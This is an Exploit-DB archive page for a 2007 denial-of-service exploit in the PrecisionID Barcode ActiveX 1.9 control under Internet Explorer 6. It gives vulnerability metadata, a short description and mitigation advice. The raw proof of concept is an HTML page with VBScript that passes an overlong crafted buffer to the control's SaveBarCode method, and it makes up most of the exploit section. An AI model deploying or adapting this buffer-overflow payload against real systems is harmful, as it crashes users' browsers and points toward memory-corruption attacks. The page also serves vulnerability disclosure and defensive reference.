IE 6 PrecisionID Barcode ActiveX 1.9 0day (PrecisionID_Barcode.dll) Denial of Service

vendor:

Barcode ActiveX control

by:

shinnai

5.5

CVSS

MEDIUM

Denial of Service

399

CWE

Product Name: Barcode ActiveX control

Affected Version From: 1.9

Affected Version To: 1.9

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional SP2 with Internet Explorer 6

2007

IE 6 PrecisionID Barcode ActiveX 1.9 0day (PrecisionID_Barcode.dll) Denial of Service

This exploit targets the PrecisionID Barcode ActiveX control version 1.9 in Internet Explorer 6. By sending a specially crafted input, an attacker can cause a denial of service condition. The exploit has been tested on Windows XP Professional SP2 with all patches applied and Internet Explorer 6. Other software that uses this ActiveX control may also be vulnerable.

Mitigation:

To mitigate this vulnerability, users are advised to update to a newer version of the PrecisionID Barcode ActiveX control or remove it if it is not necessary. Additionally, keeping the operating system and browser up to date with the latest patches and security updates can help prevent exploitation.

Source

Exploit-DB raw data:

<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/16</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">---------------------------------------------------------------------------------------
 <b>IE 6 PrecisionID Barcode ActiveX 1.9 0day (PrecisionID_Barcode.dll) Denail of Service</b>
 url: http://www.precisionid.com/

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6
 all software that use this ocx are vulnerable to these exploits.

 If you try this exploit with IE 7, it just stops to answer
---------------------------------------------------------------------------------------

<object classid='clsid:731766D0-8541-11DB-99C1-0050C2490048' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  buff = String(348,"A")
  get_ESI = "aaaa"
  buff1 = String(665,"B")
  test.SaveBarCode buff + get_ESI + buff1
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-05-16]